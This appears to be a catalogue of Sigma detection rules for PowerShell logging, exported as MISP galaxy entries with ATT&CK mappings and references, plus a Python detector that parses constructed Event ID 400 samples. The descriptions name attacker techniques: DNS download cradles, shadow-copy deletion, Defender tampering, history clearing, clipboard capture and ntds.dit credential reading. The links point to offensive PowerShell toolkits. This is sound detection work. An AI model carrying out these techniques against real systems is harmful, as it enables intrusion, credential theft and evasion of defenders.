The tag is: misp-galaxy:sigma-rules="Suspicious Non PowerShell WSMAN COM Provider"

Suspicious Non PowerShell WSMAN COM Provider has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9604. Table References

Links

https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/

https://github.com/bohops/WSMan-WinRM

https://twitter.com/chadtilbury/status/1275851297770610688

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml

Use Get-NetTCPConnection

Detects use of the Get-NetTCPConnection cmdlet to list network connections. Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing, or from remote systems by querying for information over the network.

The tag is: misp-galaxy:sigma-rules="Use Get-NetTCPConnection"

Use Get-NetTCPConnection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 9605. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml

Remote PowerShell Session (PS Classic)

Detects remote PowerShell sessions

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Session (PS Classic)"

Remote PowerShell Session (PS Classic) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9606. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml

PowerShell Called from an Executable Version Mismatch

Detects PowerShell being hosted by another executable, using the version mismatch method: the host version recorded in the engine start event differs from the engine version actually running.

The tag is: misp-galaxy:sigma-rules="PowerShell Called from an Executable Version Mismatch"

PowerShell Called from an Executable Version Mismatch has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9607. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml

PowerShell Downgrade Attack - PowerShell

Detects a PowerShell downgrade attack by comparing the host version with the engine version actually used: engine version 2.0 running under a host that is not itself version 2.

The tag is: misp-galaxy:sigma-rules="PowerShell Downgrade Attack - PowerShell"

PowerShell Downgrade Attack - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9608. Table References

Links

http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml

Delete Volume Shadow Copies Via WMI With PowerShell

Detects deletion of Volume Shadow Copies using operating system utilities invoked via PowerShell.

The tag is: misp-galaxy:sigma-rules="Delete Volume Shadow Copies Via WMI With PowerShell"

Delete Volume Shadow Copies Via WMI With PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9609. Table References

Links

https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml

Suspicious XOR Encoded PowerShell Command Line - PowerShell

Detects a suspicious PowerShell process whose command line uses the bxor operator, an obfuscation method used as an alternative to Base64-encoded commands.

The tag is: misp-galaxy:sigma-rules="Suspicious XOR Encoded PowerShell Command Line - PowerShell"

Suspicious XOR Encoded PowerShell Command Line - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9610. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml

Tamper Windows Defender - PSClassic

Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP, or to set its default actions to allow.

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender - PSClassic"

Tamper Windows Defender - PSClassic has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9611. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml

Zip A Folder With PowerShell For Staging In Temp - PowerShell

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Zip A Folder With PowerShell For Staging In Temp - PowerShell"

Zip A Folder With PowerShell For Staging In Temp - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 9612. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml

Suspicious PowerShell Download

Detects suspicious PowerShell download command

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download"

Suspicious PowerShell Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9613. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml

Renamed Powershell Under Powershell Channel

Detects a renamed PowerShell binary by checking that the host application recorded in PowerShell's own event channel is not the standard PowerShell executable.

The tag is: misp-galaxy:sigma-rules="Renamed Powershell Under Powershell Channel"

Renamed Powershell Under Powershell Channel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9614. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml

Potential RemoteFXvGPUDisablement.EXE Abuse

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential RemoteFXvGPUDisablement.EXE Abuse"

Potential RemoteFXvGPUDisablement.EXE Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9615. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml

Nslookup PowerShell Download Cradle

Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.

The tag is: misp-galaxy:sigma-rules="Nslookup PowerShell Download Cradle"

Nslookup PowerShell Download Cradle has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9616. Table References

Links

https://twitter.com/Alh4zr3d/status/1566489367232651264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml

Alternate PowerShell Hosts - PowerShell Module

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

The tag is: misp-galaxy:sigma-rules="Alternate PowerShell Hosts - PowerShell Module"

Alternate PowerShell Hosts - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9617. Table References

Links

https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml
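Four of the rules above (PowerShell Called from an Executable Version Mismatch, PowerShell Downgrade Attack, Renamed Powershell Under Powershell Channel, Alternate PowerShell Hosts) all read the same few fields that PowerShell writes when an engine starts: HostVersion, EngineVersion and HostApplication in the "Details" block of the classic Event ID 400. The following is an added example, not code from the MISP galaxy or from the Sigma project, that parses constructed Event ID 400 messages and applies all three checks. The message layout follows the classic PowerShell log; the allow-list of host executables and the sample events are assumptions for illustration.

```python
import ntpath

# Executables expected to host the PowerShell engine. ASSUMED allow-list; extend
# it with legitimate hosts in your estate (e.g. management agents) before use.
KNOWN_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}


def parse_engine_event(message):
    """Turn the key=value lines of an Event ID 400 message into a dict."""
    fields = {}
    for line in message.splitlines():
        line = line.strip()
        if "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def host_executable(host_application):
    """Lower-cased basename of the executable named in HostApplication,
    tolerating quoted paths with spaces and trailing arguments."""
    low = host_application.strip().strip('"').lower()
    end = low.find(".exe")
    path = low[: end + 4] if end != -1 else low.split(" ")[0]
    return ntpath.basename(path)


def assess_engine_event(fields):
    """Apply the downgrade, version-mismatch and unexpected-host checks."""
    findings = []
    engine = fields.get("EngineVersion", "")
    host = fields.get("HostVersion", "")
    app = fields.get("HostApplication", "")
    if engine.startswith("2.") and not host.startswith("2."):
        # Downgrade: a modern host deliberately started the v2 engine.
        findings.append(f"downgrade: engine {engine} under host {host}")
    elif engine and host and engine.split(".")[0] != host.split(".")[0]:
        # Mismatch: the host reports a different major version than the engine,
        # typical of a custom executable embedding System.Management.Automation.
        findings.append(f"version mismatch: engine {engine}, host {host}")
    if app and host_executable(app) not in KNOWN_HOSTS:
        findings.append(f"unexpected host application: {host_executable(app)}")
    return findings


def scan_engine_events(messages):
    """Return (HostApplication, findings) for every message with at least one finding."""
    hits = []
    for msg in messages:
        fields = parse_engine_event(msg)
        findings = assess_engine_event(fields)
        if findings:
            hits.append((fields.get("HostApplication", ""), findings))
    return hits


def make_event_400(host_name, host_version, host_application, engine_version):
    """Build a constructed Event ID 400 message in the classic log's layout."""
    return (
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n"
        f"\tHostName={host_name}\n\tHostVersion={host_version}\n"
        "\tHostId=8e2f4a84-0000-4000-8000-000000000000\n"
        f"\tHostApplication={host_application}\n\tEngineVersion={engine_version}\n"
        "\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n"
        "\tScriptName=\n\tCommandPath=\n\tCommandLine="
    )


# Constructed samples: benign start, downgrade, custom host exe, renamed binary.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    make_event_400("ConsoleHost", "5.1.19041.1", PS_EXE, "5.1.19041.1"),
    make_event_400("ConsoleHost", "5.1.19041.1", PS_EXE + " -version 2", "2.0"),
    make_event_400("Default Host", "3.0.0.0",
                   r"C:\Users\alice\AppData\Local\Temp\loader.exe", "5.1.19041.1"),
    make_event_400("ConsoleHost", "5.1.19041.1",
                   r"C:\Users\Public\svchost.exe -nop -w hidden", "5.1.19041.1"),
]

if __name__ == "__main__":
    for app, findings in scan_engine_events(SAMPLE_EVENTS):
        print(app, "->", findings)
```

Event ID 400 is written by the engine itself, so these checks survive a renamed binary; what they do not survive is a host that disables the classic log, which is why the module-logging variant of the alternate-hosts rule reads the same Host Application value from Event ID 4103 instead.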

Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

Detects obfuscated use of STDIN to launch PowerShell, as generated by the Invoke-Obfuscation STDIN+ launcher.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - PowerShell Module"

Invoke-Obfuscation STDIN+ Launcher - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9618. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml

Bad Opsec Powershell Code Artifacts

Focuses on trivial artifacts observed in variants of prevalent offensive PowerShell (.ps1) payloads, including Cobalt Strike Beacon, PoshC2, PowerView, Letmein, Empire, PowerSploit and other attack payloads that often undergo only minimal changes by attackers due to bad opsec.

The tag is: misp-galaxy:sigma-rules="Bad Opsec Powershell Code Artifacts"

Bad Opsec Powershell Code Artifacts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9619. Table References

Links

https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/

https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/

https://www.mdeditor.tw/pl/pgRt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml

Potential Active Directory Enumeration Using AD Module - PsModule

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration without RSAT being installed.

The tag is: misp-galaxy:sigma-rules="Potential Active Directory Enumeration Using AD Module - PsModule"

Table 9620. Table References

Links

https://twitter.com/cyb3rops/status/1617108657166061568?s=20

https://github.com/samratashok/ADModule

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml

PowerShell Get Clipboard

A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.

The tag is: misp-galaxy:sigma-rules="PowerShell Get Clipboard"

PowerShell Get Clipboard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 9621. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md

https://github.com/OTRF/detection-hackathon-apt29/issues/16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml

PowerShell Decompress Commands

A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.

The tag is: misp-galaxy:sigma-rules="PowerShell Decompress Commands"

PowerShell Decompress Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 9622. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md

https://github.com/OTRF/detection-hackathon-apt29/issues/8

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml

AD Groups Or Users Enumeration Using PowerShell - PoshModule

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

The tag is: misp-galaxy:sigma-rules="AD Groups Or Users Enumeration Using PowerShell - PoshModule"

AD Groups Or Users Enumeration Using PowerShell - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9623. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml

Invoke-Obfuscation Via Use Clip - PowerShell Module

Detects obfuscated PowerShell in scripts that stages its payload through clip.exe, as generated by the Invoke-Obfuscation "use clip" launcher.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - PowerShell Module"

Invoke-Obfuscation Via Use Clip - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9624. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

Detects obfuscated PowerShell generated by the Invoke-Obfuscation VAR++ launcher.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9625. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml

Suspicious Get Local Groups Information

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Local Groups Information"

Suspicious Get Local Groups Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9626. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml

Suspicious Get-ADDBAccount Usage

Detects suspicious invocation of the Get-ADDBAccount cmdlet, which reads accounts directly from an ntds.dit file and may be used to obtain credentials without running any credential dumper.

The tag is: misp-galaxy:sigma-rules="Suspicious Get-ADDBAccount Usage"

Suspicious Get-ADDBAccount Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9627. Table References

Links

https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/

https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml

Clear PowerShell History - PowerShell Module

Detects keywords that could indicate clearing PowerShell history

The tag is: misp-galaxy:sigma-rules="Clear PowerShell History - PowerShell Module"

Clear PowerShell History - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9628. Table References

Links

https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module"

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9629. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml

Malicious PowerShell Commandlets - PoshModule

Detects Commandlet names from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Commandlets - PoshModule"

Malicious PowerShell Commandlets - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9630. Table References

Links

https://github.com/adrecon/AzureADRecon

https://github.com/besimorhino/powercat

https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1

https://github.com/calebstewart/CVE-2021-1675

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/samratashok/nishang

https://github.com/Kevin-Robertson/Powermad

https://github.com/HarmJ0y/DAMP

https://github.com/adrecon/ADRecon

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml

Remote PowerShell Session (PS Module)

Detects remote PowerShell sessions

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Session (PS Module)"

Remote PowerShell Session (PS Module) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9631. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml

Suspicious Get Information for SMB Share - PowerShell Module

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Information for SMB Share - PowerShell Module"

Suspicious Get Information for SMB Share - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9632. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml

Invoke-Obfuscation Via Use MSHTA - PowerShell Module

Detects obfuscated PowerShell that uses MSHTA in scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - PowerShell Module"

Invoke-Obfuscation Via Use MSHTA - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9633. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module"

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9634. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml

Suspicious PowerShell Download - PoshModule

Detects suspicious PowerShell download command

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download - PoshModule"

Suspicious PowerShell Download - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9635. Table References

Links

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml

Invoke-Obfuscation Via Stdin - PowerShell Module

Detects obfuscated PowerShell via stdin in scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - PowerShell Module"

Invoke-Obfuscation Via Stdin - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9636. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml

Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - PowerShell Module"

Invoke-Obfuscation CLIP+ Launcher - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9637. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

